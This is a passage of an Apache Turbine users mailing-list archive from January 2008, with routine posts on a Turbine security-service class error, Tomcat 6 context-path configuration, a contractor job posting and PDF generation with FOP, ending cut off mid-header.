services.SecurityService.user.manager=3Dorg.apache.turbine.services.securit= y.db.DBUserManager services.SecurityService.secure.passwords=3Dfalse services.SecurityService.secure.passwords.algorithm=3DSHA j'obtiens l'erreur suivante dans mes logs : 2008-01-03 09:38:46,315 [main] ERROR system - java.lang.ClassNotFoundException:=20 org.apache.turbine.services.security.DBUserManager at=20 org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.ja= va:1332) at=20 org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.ja= va:1181) at java.lang.ClassLoader.loadClassInternal(ClassLoader.java:319) at java.lang.Class.forName0(Native Method) at java.lang.Class.forName(Class.java:164) at=20 org.apache.turbine.services.security.BaseSecurityService.init(BaseSecurityS= ervice.java:204) rethrown as org.apache.turbine.services.InitializationException:=20 BaseSecurityService.init: Failed to instantiate Use\ rManager: org.apache.turbine.services.security.DBUserManager at=20 org.apache.turbine.services.security.BaseSecurityService.init(BaseSecurityS= ervice.java:210) at=20 org.apache.turbine.services.TurbineBaseService.init(TurbineBaseService.java= :108) at=20 org.apache.turbine.services.BaseInitableBroker.initClass(BaseInitableBroker= .java:149) at=20 org.apache.turbine.services.BaseServiceBroker.doInitService(BaseServiceBrok= er.java:224) at=20 org.apache.turbine.services.BaseServiceBroker.initServices(BaseServiceBroke= r.java:193) at org.apache.turbine.Turbine.init(Turbine.java:257) at javax.servlet.GenericServlet.init(GenericServlet.java:211) at=20 org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1= 091) at=20 org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:925) at=20 org.apache.catalina.core.StandardContext.loadOnStartup(StandardContext.java= :3857) at=20 org.apache.catalina.core.StandardContext.start(StandardContext.java:4118) at=20 org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:= 759) at=20 org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:739) at=20 org.apache.catalina.core.StandardHost.addChild(StandardHost.java:524) at=20 org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:589) at=20 org.apache.catalina.startup.HostConfig.deployDescriptors(HostConfig.java:53= 6) at=20 org.apache.catalina.startup.HostConfig.deployApps(HostConfig.java:471) at=20 org.apache.catalina.startup.HostConfig.start(HostConfig.java:1102) at=20 org.apache.catalina.startup.HostConfig.lifecycleEvent(HostConfig.java:311) at=20 org.apache.catalina.util.LifecycleSupport.fireLifecycleEvent(LifecycleSuppo= rt.java:119) at=20 org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1020) at=20 org.apache.catalina.core.StandardHost.start(StandardHost.java:718) at=20 org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1012) at=20 org.apache.catalina.core.StandardEngine.start(StandardEngine.java:442) at=20 org.apache.catalina.core.StandardService.start(StandardService.java:450) at=20 org.apache.catalina.core.StandardServer.start(StandardServer.java:683) at org.apache.catalina.startup.Catalina.start(Catalina.java:537) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] -- Ce message et toutes les pieces jointes (ci-apres le "message") sont confidentiels et etablis a l'intention exclusive de ses destinataires. Toute utilisation ou diffusion non autorisee est interdite. Tout message etant susceptible d'alteration, l'emetteur decline toute responsabilite au titre de ce message s'il a ete altere, deforme ou falsifie. ----------------------------------- This message and any attachments (the "message") are confidential and intended solely for the addressees. Any unauthorised use or dissemination is prohibited. As e-mails are susceptible to alteration, the issuer shall not be liable for the message if altered, changed or falsified. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jan 08 08:58:36 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34706 invoked from network); 8 Jan 2008 08:58:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jan 2008 08:58:36 -0000 Received: (qmail 30243 invoked by uid 500); 8 Jan 2008 08:58:25 -0000 Delivered-To: [email protected] Received: (qmail 29969 invoked by uid 500); 8 Jan 2008 08:58:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 29960 invoked by uid 99); 8 Jan 2008 08:58:24 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Jan 2008 00:58:24 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Jan 2008 08:58:13 +0000 Received: by rv-out-0910.google.com with SMTP id k20so7398550rvb.1 for <[email protected]>; Tue, 08 Jan 2008 00:58:00 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=UVEcauuDNTempHATuAkDPha0y/K4gqzTjnCl3j9m7eI=; b=GZMp4WvFMBUt0r1iz9IHG3OCGaSSbyVkF91dQ+0DQB11G4YkVHgSrA6ZO+NtDdHNFu3BRsGwdbpr6Dl5ilu3Nqry7iUcJSEwW13Pc366fxTVq/48yvx4f0yqSWMPysOk6VZsA477tc1pSwE3SXpt++h6n50M3UtVLwlKU37CiTA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type; b=MHG9H9k8ZK/LeO9K78OUBX73UL/lKU4H3L7Z6zkAujqxkHq6uaC6hKIgvhvioMeF81r+MI/AA4qGie1CHyAM20PKP75jYW3AdZw99+T8hIVBmE3S7OSlMjrrKelTOd3B8OVT1f6Hc1RdaN1SV8A44rvWg/SsTFTWRnousrX0160= Received: by 161.129.204.104 with SMTP id g10mr237790rvd.151.1199782680523; Tue, 08 Jan 2008 00:58:00 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 8 Jan 2008 00:58:00 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 8 Jan 2008 14:28:00 +0530 From: "mn.dheenathayalan Sivam" <[email protected]> To: [email protected] Subject: Tomcat 6 + Context path configuration + JSP MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_7500_21076404.1199782680470" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_7500_21076404.1199782680470 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Content-Disposition: inline dear java, im using TOMCAT 6. i have some images in Server's local directory "D:\contents\images". (not inside in webapps) i want to show the images in JSP from that server directory. like <img src="" /> how to give tha path inside src=??? for that im trying to configure context path in conf\context.xml. code, <Context path="/contents" docBase="D:\contents\images" debug="0" reloadable="true" crossContext="true" trusted="true" privileged="true"> </Context> in jsp, <img src="/contents/computers02600tj0.jpg" width="51" height="41" /> but i cant get the result. reg my above ?, i have created the following file in the name of Context (MyProject) reference: http://tomcat.apache.org/tomcat-6.0-doc/config/context.html For Tomcat 6, unlike Tomcat 4.x, it is NOT recommended to place <Context> elements directly in the server.xml file. This is because it makes modifing the Context configuration more invasive since the main conf/server.xml file cannot be reloaded without restarting Tomcat. Context elements may be explicitly defined: in the $CATALINA_HOME/conf/context.xml file: the Context element information will be loaded by all webapps in the $CATALINA_HOME/conf/[enginename]/[hostname]/context.xml.default file: the Context element information will be loaded by all webapps of that host in individual files (with a ".xml" extension) in the $CATALINA_HOME/conf/[enginename]/[hostname]/ directory. The name of the file (less the .xml) extension will be used as the context path. Multi-level context paths may be defined using #, e.g. context#path.xml. The default web application may be defined by using a file called ROOT.xml. if the previous file was not found for this application, in an individual file at /META-INF/context.xml inside the application files inside a Host element in the main conf/server.xml $CATALINA_HOME/conf/[enginename]/[hostname]/ directory. my Context file: $CATALINA_HOME/conf/Catalina/localhost/MyProject.xml MyProject.xml contains <Context path="/contents" docBase="D:\contents\images\preview" reloadable="true" crossContext="true" privileged="true" debug="1" /> after using this, my Tomcat server doesnot loaded properly, when i was trying to restart. i got below the error in Log file, Jan 8, 2008 11:07:34 AM org.apache.catalina.core.ApplicationContext log INFO: ContextListener: contextInitialized() Jan 8, 2008 11:07:34 AM org.apache.catalina.core.ApplicationContext log INFO: SessionListener: contextInitialized() Jan 8, 2008 11:07:34 AM org.apache.catalina.core.StandardContext filterStart SEVERE: Exception starting filter CAS Filter java.lang.NoClassDefFoundError: [email protected].<clinit>(CASFilter.java:87) at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) at sun.reflect.NativeConstructorAccessorImpl.newInstance( NativeConstructorAccessorImpl.java:39) at sun.reflect.DelegatingConstructorAccessorImpl.newInstance( DelegatingConstructorAccessorImpl.java:27) at java.lang.reflect.Constructor.newInstance(Constructor.java:494) at java.lang.Class.newInstance0(Class.java:350) at java.lang.Class.newInstance(Class.java:303) at org.apache.catalina.core.ApplicationFilterConfig.getFilter( ApplicationFilterConfig.java:255) at org.apache.catalina.core.ApplicationFilterConfig.setFilterDef( ApplicationFilterConfig.java:397) at org.apache.catalina.core.ApplicationFilterConfig.<init>( ApplicationFilterConfig.java:108) at org.apache.catalina.core.StandardContext.filterStart(StandardContext.java :3693) at org.apache.catalina.core.StandardContext.start(StandardContext.java:4340) at org.apache.catalina.core.ContainerBase.addChildInternal( ContainerBase.java:791) at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:771) at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:525) at org.apache.catalina.startup.HostConfig.deployDirectory(HostConfig.java :920) at org.apache.catalina.startup.HostConfig.deployDirectories(HostConfig.java :883) at org.apache.catalina.startup.HostConfig.deployApps(HostConfig.java:492) at org.apache.catalina.startup.HostConfig.start(HostConfig.java:1138) at org.apache.catalina.startup.HostConfig.lifecycleEvent(HostConfig.java :311) at org.apache.catalina.util.LifecycleSupport.fireLifecycleEvent( LifecycleSupport.java:117) at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1053) at org.apache.catalina.core.StandardHost.start(StandardHost.java:719) at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1045) at org.apache.catalina.core.StandardEngine.start(StandardEngine.java:443) at org.apache.catalina.core.StandardService.start(StandardService.java:516) at org.apache.catalina.core.StandardServer.start(StandardServer.java:710) at org.apache.catalina.startup.Catalina.start(Catalina.java:566) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java :39) at sun.reflect.DelegatingMethodAccessorImpl.invoke( DelegatingMethodAccessorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:585) at org.apache.catalina.startup.Bootstrap.start(Bootstrap.java:288) at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:413) Jan 8, 2008 11:07:34 AM org.apache.catalina.core.ApplicationContext log INFO: SessionListener: contextDestroyed() Jan 8, 2008 11:07:34 AM org.apache.catalina.core.ApplicationContext log INFO: ContextListener: contextDestroyed() plz guid me reg. this. its very URGENT. tnx. ------=_Part_7500_21076404.1199782680470-- From [email protected] Wed Jan 09 14:52:51 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67937 invoked from network); 9 Jan 2008 14:52:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jan 2008 14:52:51 -0000 Received: (qmail 88508 invoked by uid 500); 9 Jan 2008 14:52:40 -0000 Delivered-To: [email protected] Received: (qmail 88494 invoked by uid 500); 9 Jan 2008 14:52:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 88485 invoked by uid 99); 9 Jan 2008 14:52:40 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Jan 2008 06:52:40 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web54008.mail.re2.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 09 Jan 2008 14:52:15 +0000 Received: (qmail 53257 invoked by uid 60001); 9 Jan 2008 14:52:19 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=nbv6Ta6yg0CPJ60MmvX9NmekVVAdC7pu+J3v6GhMMEv7377Ax3HxH5T8xC3Ik17oKIzHf0BOwiUBpSefGi3PM2Tsn9z/jZAov4wWPor8+aroj8BmSziiyMu3rL5HHhIWZxMjUYWRG10rvPO2b5bmRQyhQBLvCT2Le8cyL/qVsww=; X-YMail-OSG: l5hL58EVM1k12oNrOHip1l4H2jGRyTs1ABdCTYThJ6NXb7Pix8qCek5Pz8qP3onhNmA3.P5PH27DMd7bNNDPdjHIwCJtBz2oAO_Jjfj8pzLm7PqCfwRFK0AKLVnKFFU1N8b0iyBVO.V1nXYk9EPQNo6RYg-- Received: from [161.129.204.104] by web54008.mail.re2.yahoo.com via HTTP; Wed, 09 Jan 2008 06:52:19 PST Date: Wed, 9 Jan 2008 06:52:19 -0800 (PST) From: Roland Pereira <[email protected]> Subject: Re: Tomcat 6 + Context path configuration + JSP To: Turbine Users List <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Message-ID: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org You could try D:\contents\images with forward slashes. Next you could try ../../../../../ such that it takes you right upto the D drive. I dont know you exact location of webapps. For e.g if it were in D:/tomcat/webapps then you could use ../../contents/images However its always a good idea to move the images folder to a directory under your webapps folder. Hope this helps --- "mn.dheenathayalan Sivam" <[email protected]> wrote: > dear java, > > im using TOMCAT 6. > > i have some images in Server's local directory > "D:\contents\images". (not > inside in webapps) > > i want to show the images in JSP from that server > directory. like <img > src="" /> > > how to give tha path inside src=??? > > for that im trying to configure context path in > conf\context.xml. > code, > > <Context path="/contents" > docBase="D:\contents\images" debug="0" > reloadable="true" crossContext="true" trusted="true" > privileged="true"> > </Context> > > in jsp, > > <img src="/contents/computers02600tj0.jpg" > width="51" height="41" /> > > but i cant get the result. > > reg my above ?, i have created the following file in > the name of Context > (MyProject) > > reference: > http://tomcat.apache.org/tomcat-6.0-doc/config/context.html > > For Tomcat 6, unlike Tomcat 4.x, it is NOT > recommended to place <Context> > elements directly in the server.xml file. This is > because it makes modifing > the Context configuration more invasive since the > main conf/server.xml file > cannot be reloaded without restarting Tomcat. > > Context elements may be explicitly defined: > > in the $CATALINA_HOME/conf/context.xml file: the > Context element information > will be loaded by all webapps > in the > $CATALINA_HOME/conf/[enginename]/[hostname]/context.xml.default > file: > the Context element information will be loaded by > all webapps of that host > in individual files (with a ".xml" extension) in the > $CATALINA_HOME/conf/[enginename]/[hostname]/ > directory. The name of the file > (less the .xml) extension will be used as the > context path. Multi-level > context paths may be defined using #, e.g. > context#path.xml. The default web > application may be defined by using a file called > ROOT.xml. > if the previous file was not found for this > application, in an individual > file at /META-INF/context.xml inside the application > files > inside a Host element in the main conf/server.xml > > $CATALINA_HOME/conf/[enginename]/[hostname]/ > directory. > > my Context file: > > $CATALINA_HOME/conf/Catalina/localhost/MyProject.xml > > MyProject.xml contains > > <Context path="/contents" > docBase="D:\contents\images\preview" > reloadable="true" crossContext="true" > privileged="true" debug="1" /> > > > after using this, my Tomcat server doesnot loaded > properly, when i was > trying to restart. > > i got below the error in Log file, > > Jan 8, 2008 11:07:34 AM > org.apache.catalina.core.ApplicationContext log > INFO: ContextListener: contextInitialized() > Jan 8, 2008 11:07:34 AM > org.apache.catalina.core.ApplicationContext log > INFO: SessionListener: contextInitialized() > Jan 8, 2008 11:07:34 AM > org.apache.catalina.core.StandardContext filterStart > SEVERE: Exception starting filter CAS Filter > java.lang.NoClassDefFoundError: > org/apache/commons/logging/LogFactory > at > edu.yale.its.tp.cas.client.filter.CASFilter.<clinit>(CASFilter.java:87) > at > sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native > Method) > at > sun.reflect.NativeConstructorAccessorImpl.newInstance( > NativeConstructorAccessorImpl.java:39) > at > sun.reflect.DelegatingConstructorAccessorImpl.newInstance( > DelegatingConstructorAccessorImpl.java:27) > at > java.lang.reflect.Constructor.newInstance(Constructor.java:494) > at java.lang.Class.newInstance0(Class.java:350) > at java.lang.Class.newInstance(Class.java:303) > at > org.apache.catalina.core.ApplicationFilterConfig.getFilter( > ApplicationFilterConfig.java:255) > at > org.apache.catalina.core.ApplicationFilterConfig.setFilterDef( > ApplicationFilterConfig.java:397) > at > org.apache.catalina.core.ApplicationFilterConfig.<init>( > ApplicationFilterConfig.java:108) > at > org.apache.catalina.core.StandardContext.filterStart(StandardContext.java > :3693) > at > org.apache.catalina.core.StandardContext.start(StandardContext.java:4340) > at > org.apache.catalina.core.ContainerBase.addChildInternal( > ContainerBase.java:791) > at > org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:771) > at > org.apache.catalina.core.StandardHost.addChild(StandardHost.java:525) > at > org.apache.catalina.startup.HostConfig.deployDirectory(HostConfig.java > :920) > at > org.apache.catalina.startup.HostConfig.deployDirectories(HostConfig.java > :883) > at > org.apache.catalina.startup.HostConfig.deployApps(HostConfig.java:492) > at > org.apache.catalina.startup.HostConfig.start(HostConfig.java:1138) > at > org.apache.catalina.startup.HostConfig.lifecycleEvent(HostConfig.java > :311) > at > org.apache.catalina.util.LifecycleSupport.fireLifecycleEvent( > LifecycleSupport.java:117) > at > org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1053) > at > org.apache.catalina.core.StandardHost.start(StandardHost.java:719) > at > org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1045) > at > org.apache.catalina.core.StandardEngine.start(StandardEngine.java:443) > at > org.apache.catalina.core.StandardService.start(StandardService.java:516) > at > org.apache.catalina.core.StandardServer.start(StandardServer.java:710) > at > org.apache.catalina.startup.Catalina.start(Catalina.java:566) > at > sun.reflect.NativeMethodAccessorImpl.invoke0(Native > Method) > at > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java > :39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke( > DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:585) > at > org.apache.catalina.startup.Bootstrap.start(Bootstrap.java:288) > at > org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:413) > Jan 8, 2008 11:07:34 AM > org.apache.catalina.core.ApplicationContext log > INFO: SessionListener: contextDestroyed() > Jan 8, 2008 11:07:34 AM > org.apache.catalina.core.ApplicationContext log > INFO: ContextListener: contextDestroyed() > > plz guid me reg. this. its very URGENT. > > tnx. > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jan 15 17:21:01 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89936 invoked from network); 15 Jan 2008 17:21:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Jan 2008 17:21:01 -0000 Received: (qmail 617 invoked by uid 500); 15 Jan 2008 17:20:50 -0000 Delivered-To: [email protected] Received: (qmail 596 invoked by uid 500); 15 Jan 2008 17:20:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 587 invoked by uid 500); 15 Jan 2008 17:20:50 -0000 Delivered-To: [email protected] Received: (qmail 584 invoked by uid 99); 15 Jan 2008 17:20:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 15 Jan 2008 09:20:50 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail.grajagan.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 15 Jan 2008 17:20:22 +0000 Received: from bigmac.activx.com (activx.com [161.129.204.104]) (authenticated bits=0) by mail.grajagan.org (8.14.1/8.14.1) with ESMTP id m0FHKOlq011853 (version=TLSv1/SSLv3 cipher=AES128-SHA bits=128 verify=NO) for <[email protected]>; Tue, 15 Jan 2008 09:20:27 -0800 Message-Id: <[email protected]> From: Helge Weissig <[email protected]> To: Turbine Users List <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v915) Subject: Southern California job opportunity Date: Tue, 15 Jan 2008 09:20:19 -0800 X-Mailer: Apple Mail (2.915) X-Greylist: Sender succeeded SMTP AUTH authentication, not delayed by milter-greylist-2.0 (mail.grajagan.org [161.129.204.104]); Tue, 15 Jan 2008 09:20:27 -0800 (PST) X-Virus-Scanned: ClamAV 0.91.2/5483/Mon Jan 14 06:45:01 2008 on bluejay.grajagan.org X-Virus-Status: Clean X-Virus-Checked: Checked by ClamAV on apache.org In the hope that this is an appropriate topic: We are currently seeking contractors for work on our torque/turbine/velocity based laboratory information management system (LIMS). I have pasted the official posting from http://www.activx.com/careers/positions.html below. Basically, we are looking to hire one or two contractors for a one year term to take our LIM system to the next level. The existing architecture is fairly mature and complex as it supports a cutting edge technology platform. We are located in the North County San Diego area and are primarily looking for someone to be able to work on-site. However, we will consider all applications based on their merit! Please do not reply to this posting with applications! cheers, h. Helge Weissig, Ph.D. Director, Bioinformatics ActivX Biosciences, Inc. ph: (262)914-4166 fx: (262)914-4166 www.activx.com Primary Responsibilities: ActivX is seeking a full time programmer on a contract basis to assist in the writing of custom software with a specific focus on web application development and automated mass spectroscopy data analysis software. The successful candidate is expected to work closely with both the bioinformatics group as well as technology/analytical staff to optimize data analysis methods, implement custom software, and integrate these features into the overall ActivX data pipeline. Responsibilities of the position range from user requirement specifications to implementation, testing and deployment within an existing multi-tiered web application framework. Requirements: BS in Computer Science and a minimum of 4 years experience programming, or MS in Computer Science, or BS in biological science with at least 5 years of programming experience. Knowledge of programming in Java (including but not limited to Web applications) and strong UNIX/Linux skills as well as strong interpersonal and organizational skills are required. Experience in statistical analysis and with proteomics and/or genomics data are highly desirable. Additional desirable experience and skills include a familiarity with software development tools and software engineering cycles. To Apply: Please email your resume to [email protected] Refer to job code: 62HW --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jan 18 09:44:19 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44534 invoked from network); 18 Jan 2008 09:44:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2008 09:44:19 -0000 Received: (qmail 70042 invoked by uid 500); 18 Jan 2008 09:44:08 -0000 Delivered-To: [email protected] Received: (qmail 70028 invoked by uid 500); 18 Jan 2008 09:44:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 70019 invoked by uid 99); 18 Jan 2008 09:44:08 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Jan 2008 01:44:08 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO dmz-scan-01.unycom.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Jan 2008 09:43:41 +0000 Received: from dmz-scan-01.unycom.com (localhost [161.129.204.104]) by localhost.unycom.com (Postfix) with ESMTP id 82B2390C510 for <[email protected]>; Fri, 18 Jan 2008 10:43:20 +0100 (CET) Received: from uny-srv-ex.unycom.com (uny-srv-ex.unycom.com [161.129.204.104])by dmz-scan-01.unycom.com (Postfix) with ESMTP id 708A390C50Afor <[email protected]>; Fri, 18 Jan 2008 10:43:20 +0100 (CET) X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C859B6.9CF558D3" Subject: Using Turbine's tools for assembling PDF output (using FOP): how to? Date: Fri, 18 Jan 2008 10:43:42 +0100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Using Turbine's tools for assembling PDF output (using FOP): how to? Thread-Index: AchZtpxsncOtVtokQgCtBUhHq+UCgA== From: "Alexander Zimmer" <[email protected]> To: "Turbine Users List" <[email protected]> X-imss-version: 2.049 X-imss-result: Passed X-imss-scanInfo: M:P L:E SM:0 X-imss-tmaseResult: TT:0 TS:0.0000 TC:00 TRN:0 TV:5.0.1023(15674.003) X-imss-scores: Clean:18.83076 C:2 M:3 S:5 R:5 X-imss-settings: Baseline:1 C:1 M:1 S:1 R:1 (0.0000 0.0000) X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C859B6.9CF558D3 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hello list, =20 I am trying to extend an existing Turbine application by a "Download" link which should result in a PDF file being served, containing the same data as in the screen template counterpart. =20 Take a video database for instance, I can browse through the video titles and have a look at specific videos by looking at their "Details.vm" screen template which would output detail information. Alternatively, I would like to offer a "Download as PDf" link which should resemble the screen output, but was assembled via FOP, presenting the video details as a sort of "video data sheet". =20 With regards to the PDF generation, I am presented with the same problems as in the course of the template screen generation: - using the l10n mechanism - possibly using other pull tools =20 Therefore it would be very reasonable to use these template services in a page which does NOT output to the HTTPServlet-request-OutputStream, but instead is able to=20 - set a MIME-Type - gather the output of the template (in which I can use the beloved set of pull tools, e.g. for internationalization), which delivers a FO String - pipe the generated FO String (or Stream) through a FO->PDF converter - stream the PDF byte stream into the servlet output =20 How can I achieve this in Turbine? The FO->PDF conversion poses no problem (in fact: is already working), but how can I tell Turbine to use the template mechanism with all pull tools but capturing the output in order to send it into the FO->PDF converter and stream it back? =20 I suppose, this has to be a special Page class capable of doing this. Could you point me in the right direction? =20 TIA, Alex ------_=_NextPart_001_01C859B6.9CF558D3-- From [email protected] Fri Jan 18 09:59:43 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56096 invoked from network); 18 Jan 2008 09:59:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2008 09:59:43 -0000 Received: (qmail 96664 invoked by uid 500); 18 Jan 2008 09:59:32 -0000 Delivered-To: [email protected] Received: (qmail 96648 invoked by uid 500); 18 Jan 2008 09:59:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 96639 invoked by uid 99); 18 Jan 2008 09:59:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Jan 2008 01:59:32 -0800 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO relay1.mail.uk.clara.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Jan 2008 09:59:04 +0000 Received: from smtp.clara.net ([161.129.204.104]) by relay1.mail.uk.clara.net with esmtp (Exim 4.62) (envelope-from <[email protected]>) id 1JFo07-0002uz-UN for [email protected]; Fri, 18 Jan 2008 09:59:04 +0000 Received: from pjcourcouxdsl.claranet.co.uk ([161.129.204.104] helo=earth.courcoux.biz) by smtp.clara.net with esmtp (Exim 4.46) id 1JFo07-0000OD-P8 for [email protected]; Fri, 18 Jan 2008 09:59:03 +0000 Received: from localhost (localhost [161.129.204.104]) by earth.courcoux.biz (Postfix) with ESMTP id B9EC61D8938 for <[email protected]>; Fri, 18 Jan 2008 10:46:32 +0000 (GMT) X-Virus-Scanned: [email protected] Received: from earth.courcoux.biz ([161.129.204.104]) by localhost (earth.courcoux.biz [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id aJKavbdH6fru for <[email protected]>; Fri, 18 Jan 2008 10:46:31 +0000 (GMT) Received: from [161.129.204.104] (localhost [161.129.204.104]) by 